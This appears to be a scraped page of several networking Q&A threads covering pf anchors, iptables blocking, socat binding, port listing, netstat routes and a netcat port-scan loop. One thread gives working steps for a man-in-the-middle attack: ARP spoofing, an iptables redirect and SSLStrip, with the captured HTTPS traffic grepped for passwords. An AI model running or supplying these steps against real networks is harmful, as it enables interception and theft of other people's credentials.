I looking wat to adding passing in/out at interfaces "in fly", first I try just add one by one to anchors by pfctl, but adding next rule clear rule before ;/
"pass in on vlanN proto tcp from any to port 22" | sudo pfctl -a vlan_ssh -f -
I was try make a table to, but it don't work with interfaces name-s - only ip-s.
table <vlan_ssh> = {vlan0, vlan1}
Related
I'm being trolled by China, and don't know why I can't block their request to my server.
//host.deny
ALL: item.taobao.com
ALL: 117.25.128.*
But when I watch the error log on my webserver tail -f /var/log/apache2/error.log the requests are still being allowed through.
Question: Why isn't my host.deny config working?
Hosts deny will not block every socket connection, only on apps that rely on hosts.deny which is ssh, inetd, and a few others. To block all connections you need to use iptables.
It varies from distro to distro but the command line is something like:
iptables -A INPUT -s 117.25.128.0/24 -j DROP
You'll need to use CIDR notation (ie, a.b.c.d/x) to do ranges. To wildcard the last digit change (class C network) it to a zero and use /24. For the last two IPs change them to zero and use /16.
Does anyone know how do I get socat to listen on all interfaces assigned to one particular network interface ? I'm not sure if it's even possible.
If I want to bind socat to a particular IP:PORT I always parse the IP info from the output of ip command and then bind socat to it like this:
NETIFC=$(ip -o -4 addr list eth0 | awk '{print $4}' | cut -d/ -f1)
socat -d -d TCP4-LISTEN:1234,fork,bind=$(NETIFC) UNIX-CLIENT:/tmp/foo.sock
I thought I would be able to achieve what I'm after by running the socat like this:
socat -d -d TCP4-LISTEN:1234,fork,so-bindtodevice=eth0 UNIX-CLIENT:/tmp/foo.sock
But I believe I'm missing some low level network programming knowledge and therefore don't quite get what is this option supposed to be doing and am just plainly hoping it should do what I want it to do, but in fact it actually binds to ALL network interfaces.
The following port forwarder listens on IP: x.y.z.t:80, without binding to 80 on any other exposed IPs (unlike the bind parameter).
SOCAT_SOCKADDR=x.y.z.t socat TCP-LISTEN:80,reuseaddr,fork,su=nobody TCP:a.b.c.d:80
If an interface has multiple IP’s, there is some experimenting to do! In the ip v4, v6 case it might be best to use two forwarders. For my current purposes, the code above is sufficient.
Specifically RHEL 6.5
It's a Dev box and we have certain port ranges we are permitted for development use.
...unfortunately, getting a tech's attention to find out what ports are available is like pulling teeth. Would prefer a script or alias that does this so that we don't have to ask all the time. Clues? Is this an iptables command or is it a netstat command or some weird combo? nmap is not available on this machine.
Please don't say this is a Server Fault question. They say it's a programming question. :-|
Definitely a SF question but here we go. From the dev box itself (command line) you should be able to see what ports are in use with the netstat tool.
To see the list of listening ports both UDP and TCP, complete with the program names:
# preferably as root
netstat --listening --program --numeric-ports --protocol=ip -6 -4
From another machine, you can use nmap or a similar tool to see what ports are open/listening by scanning the IP address assigned to the dev box. Before trying this, maybe you should ask for permission. Also, you should consider that the box in question might have firewall rules in place that can thwart your scanning attempts.
To see what firewall rules are in place in the dev box try:
# as root
iptables -nvxL -t filter
# maybe there are NAT rules, redirects to other addresses, etc.
iptables -nvxL -t nat
To see what these iptables options do, try man iptables.
As an example, assuming 172.16.0.1 is the IP address assigned to the dev box, to run nmap in the simplest way possible:
# preferably as root
nmap -v 172.16.0.1
In a few minutes you should see a list of ports/services listening in that relevant box.
Try man nmap and read the documentation for more details.
If you really think this is a programming issue, you can use the netcat tool and program a simple script to do something roughly equivalent to what nmap does.
#!/bin/bash
#
# DISCLAIMER: NOT TESTED -- just an example
# NOTE: This will take many DAYS to complete
HOST=172.16.0.1
for port in `seq 1 65535`
do
echo "Trying ${port}..."
netcat -vvv ${HOST} $port -w 1 -z
done
For every open TCP port you should see a line similar to this:
Connection to 172.16.0.1 23 port [tcp/telnet] succeeded!
i am using Backtrack5 for this ..but am stuck ...i am not able to get the data i want, i am using Ettercap and SSL Strip for this...
Does any one here any idea of how to do it ?
Idk how you're doing it, but for me ettercap-gtk (the gui) has always been garbage. I recommend skipping ettercap unless you want easy DNS spoofing, and go another route.
Let me give you some steps, starting with setting up your iptables for this attack (Man in the middle, amirite) and enabling ip_forward(ing)
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1337 (Can choose any port you want to send them to)
Now to be the man in the middle: Here we use arpspoof:
arpspoof -i wlan0(or whatever interface) 192.168.1.X(X is the gateway typically .1 or .255)
Then with SSLStrip you can go ahead and ./sslstrip.py -1 1337 -w filename (1337 is the port from earlier, filename is any filename you want to dump the data to)
cat filename(from earlier) and even pipe | grep "password" or whatever you're sniffing for, or you can just dump everything. The file will be filling up with captured/stripped https data.
Below is the output of the netstat command with -n & -r options in which the destination field shows compacted address (127.1/16). I wanted to know that is there any way or options available to netstat command to display entire Destination IP (127.1.0.0/16) rather than (127.1/16) ?
#netstat -r -n
Destination Gateway Flags Refs Use Mtu Interface
127.0.0.1 127.0.0.1 UH 110 296172 33212 lo0
127.1/16 link#7 UC 2 0 - vlan10
But the command is not showing 127.1.0.0/8, it's showing 127.1/16, which means the whole 127.1.x.x range.
Read up on netmasks: http://en.wikipedia.org/wiki/Subnetwork#IPv4_subnetting
And experiment with them here, to get a better understanding: http://jodies.de/ipcalc
You may want to consider alternatives to just using netstat. "netstat -r" gives the same output as "route". You could also try "ip route show", or "ip route show dev " if you want to see routes going via a particular device/interface. Your may also be interested the output returned by "routel".